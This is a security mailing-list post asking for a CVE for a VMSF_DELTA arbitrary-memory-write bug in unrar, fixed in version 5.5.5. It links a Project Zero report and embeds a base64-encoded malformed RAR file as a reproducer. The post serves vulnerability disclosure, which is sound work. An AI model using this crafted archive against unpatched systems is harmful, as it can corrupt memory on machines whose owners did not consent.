CVE Request: unrar: VMSF_DELTA filter allows arbitrary memory write

[Alexander Bergmann <abergmann () suse com>]

Hi,

It was reported that unrar fixed a VMSF_DELTA memory corruption issue in
there latest version unrarsrc-5.5.5.tar.gz. This problem was reported to
Sophos AV in 2012 but never reach upstream rar.

https://bugs.chromium.org/p/project-zero/issues/detail?id=1286&desc=6#maincol

Reproducer:

Base64-encoded RAR file to trigger the VMSF_DELTA issue:

UmFyIRoHAPlOcwAADgAAAAAAAAAAMAh0AAAmAI4AAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwAmwAAAAAvv////+/////+9W3QFgAAQAGAAAA
Ooimhd12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

As far as I can tell no CVE was assigned to this issue so far.


Regrads,
Alex~

-- 
Alexander Bergmann <abergmann () suse com>, Security Engineer, GPG:9FFA4886
SUSE Linux GmbH, GF: Felix Imendörffer, Jane Smithard, Graham Norton
HRB 21284 (AG Nürnberg)

Attachment: signature.asc
Description: Digital signature